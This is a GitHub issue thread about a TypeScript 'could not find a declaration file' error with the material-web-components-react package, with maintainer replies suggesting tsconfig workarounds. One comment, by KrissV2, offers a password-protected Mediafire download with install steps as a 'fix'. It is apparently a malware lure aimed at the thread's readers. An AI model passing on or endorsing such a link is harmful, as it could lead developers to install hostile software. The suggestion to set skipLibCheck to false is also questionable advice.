### ISSUE TITLE
Error when using with react and typescript

### ISSUE THREAD

**Issue by RobertSobral** [grayhatdevelopers/material-web-components-react#14]
When I use it with react and typescript I get the following error

Could not find a declaration file for module 'material-web-components-react/checkbox'. 'c:/Users/Robert/Desktop/Test/app/node_modules/material-web-components-react/checkbox/index.js' implicitly has an 'any' type.
  Try `npm i --save-dev @types/material-web-components-react` if it exists or add a new declaration (.d.ts) file containing `declare module 'material-web-components-react/checkbox';

**Comment by SaadBazaz** [comment]
This is an open issue we're trying to solve: #12 
In the meanwhile, you can probably set `skipLibCheck` to `false`, and `strict` to `false`, in your tsconfig.json to temporarily bypass this issue.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by SaadBazaz** [comment]
@abbaty48 Let me share a TS config which worked:
https://github.com/grayhatdevelopers/material-web-components-react/blob/main/apps/demo/tsconfig.json

This is the config of the `demo` app in this repository.

**Comment by abbaty48** [comment]
@SaadBazaz well, i'll give it a try, thanks
